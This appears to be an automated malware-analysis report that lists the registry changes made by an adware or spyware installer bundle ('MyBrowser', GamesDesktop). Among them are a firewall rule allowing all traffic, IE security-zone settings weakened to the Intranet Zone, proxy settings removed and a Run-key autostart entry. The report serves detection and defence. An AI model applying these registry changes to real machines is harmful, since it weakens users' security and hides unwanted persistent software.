[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayName" = "MyBrowser"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".shtml" = "CRSBRWSHTML"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"ShowIconsCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --show-icons"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"ftp" = "CRSBRWSHTML"
[HKCR\ftp\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Classes\.xhtml]
"(Default)" = "CRSBRWSHTML"
[HKCR\ftp\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser]
"(Default)" = "MyBrowser"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"HideIconsCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --hide-icons"
[HKCR\.xhtml\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"InstallLocation" = "%Program Files%\MyBrowser\MyBrowser\Application"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"ServerExecutable" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationIcon" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"http" = "CRSBRWSHTML"
[HKCU\Software\Clients\StartmenuInternet]
"(Default)" = "MyBrowser"
[HKCU\Software\Classes\https\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCU\Software\Classes\http\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".html" = "CRSBRWSHTML"
Adds a rule to the Windows firewall which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\MyBrowser\MyBrowser\Application]
"mybrowser.exe" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe:*:Enabled:MyBrowser"
The SpyTool deletes the following value(s) in system registry:
[HKLM\SOFTWARE\MyBrowser\Installer]
"ap"
"InstallerExtraCode1"
The process nsy18.tmp:1632 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "85 E5 5F F8 51 FF CD DB 7D 18 C7 DD 0B 58 F9 FD"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process nsn4.tmp:224 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6B 52 67 B3 13 FA 3C C7 6C 2E C8 B8 5D 0C B7 AE"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE security zone settings so that all local web nodes with no dots in their names that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process taskkill.exe:1632 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E B3 0E 2E C3 E4 76 9F F4 34 AD CA F1 C8 79 1E"
The process taskkill.exe:484 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A6 1B 47 AD A6 29 70 52 2C 75 94 73 42 30 B9 90"
The process taskkill.exe:220 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D DB 84 08 5D C2 1C 44 6A 9B 19 17 18 8F 57 B4"
The process wmic.exe:1524 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "63 F0 46 BA 55 05 15 B7 CC 02 54 A1 69 DC A2 6E"
The process amisid.exe:224 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"
[HKCU\Software\InternetTurbo]
"UID" = "C8318CA6891F5119A9FD96EC19E98D71"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "74 E7 EF DF E0 7F 95 AF 48 C6 2C F0 EA 56 FE 44"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level" = ""
The SpyTool deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level"
The process amisid.exe:1228 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 E9 2F 99 2D 79 C2 69 E4 71 36 7B 7F 44 0D E4"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
[HKCU\Software\InternetTurbo]
"UID" = "C8318CA6891F5119A9FD96EC19E98D71"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"
The process nsp1D.tmp:1376 makes changes in the system registry.
The SpyTool creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "19 40 F2 F2 65 3C 93 4C 8A FE 2F 9C 6A B2 AA 6E"
[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"
[HKCU\Software\Crossbrowse]
"Preinstall" = "1"
The process %original file name%.exe:1704 makes changes in the system registry.
The SpyTool creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 8A E3 BE 05 FC 1D E4 80 57 0F C4 08 B6 F8 85"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE security-zone settings so that all local web-nodes with no dots that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE security-zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsd3C.tmp:1776 makes changes in the system registry.
The SpyTool creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "95 94 49 0A 54 D9 B8 1C CE 5C 0D 1A F9 76 8E 8B"
The process nsd3C.tmp:848 makes changes in the system registry.
The SpyTool creates and/or sets the following values in the system registry:
[HKCU\Software\Tutorials\updv]
"Version" = "15.09.06"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010082_is1]
"NoRepair" = "1"
"Publisher" = "GAMESDESKTOP"
"Inno Setup: Setup Version" = "5.5.5 (a)"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010082_is1]
"InstallLocation" = "%Program Files%\gmsd_re_005010082\"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010082_is1]
"QuietUninstallString" = "%Program Files%\gmsd_re_005010082\unins000.exe /SILENT"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010082_is1]
"InstallDate" = "20150907"
"NoModify" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010082_is1]
"DisplayName" = "GamesDesktop 092.005010082"
[HKCU\Software\Tutorials\updatetutorialshp]
"MainDir" = ""
[HKCU\Software\TutoTag]
"OnceInstalled" = "re"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\GAMESDESKTOP\gmsd_re_005010082]
"PathInstall" = "%Program Files%\gmsd_re_005010082"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010082_is1]
"URLUpdateInfo" = "http://re.gamesdesktop.com"
[HKCU\Software\Microsoft]
"Tinstalls" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010082_is1]
"Inno Setup: User" = "%CurrentUserName%"
"Inno Setup: Icon Group" = "GAMESDESKTOP"
[HKCU\Software\Microsoft\Tinstalls]
"20150907" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010082_is1]
"Inno Setup: App Path" = "%Program Files%\gmsd_re_005010082"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D EE CC 19 15 56 89 9F DE C9 04 27 1C 99 46 CA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010082_is1]
"HelpLink" = "http://re.gamesdesktop.com"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010082_is1]
"UninstallString" = "%Program Files%\gmsd_re_005010082\unins000.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010082_is1]
"Inno Setup: Language" = "re"
"URLInfoAbout" = "http://re.gamesdesktop.com"
[HKCU\Software\TutoTag]
"AgenceInstalledYet" = "true"
"OnceInstalled2" = "re"
To run itself automatically each time Windows boots, the SpyTool adds a link to its file under the following system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"gmsd_re_005010082" = "%Program Files%\gmsd_re_005010082\gmsd_re_005010082.exe"
The SpyTool deletes the following registry key(s):
[HKCU\Software\Microsoft\Active Setup\Installed Components\{22d6f312-b0f6-11d0-94ab-0080c74c7e95}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{881dd1c5-3dcf-431b-b061-f3f88e8be88a}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{2179C5D3-EBFF-11CF-B6FD-00AA00B4E220}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{5945c046-1e7d-11d1-bc44-00c04fd912be}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}]
[HKCU\Software\Microsoft\Active Setup]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{60B49E34-C7CC-11D0-8953-00A0C90347FF}MICROS]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA848-CC51-11CF-AAFA-00AA00B6015C}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{7790769C-0471-11d2-AF11-00C04FA35D02}]
[HKCU\Software\Microsoft\Active Setup\Installed Components]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA842-CC51-11CF-AAFA-00AA00B6015B}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{4b218e3e-bc98-4770-93d3-2731b9329278}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}]
The process 2835.exe:792 makes changes in the system registry.
The SpyTool creates and/or sets the following values in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\3290]
"setup.exe" = "MyBrowser Installer"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Tempo]
"(Default)" = "Tempo"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
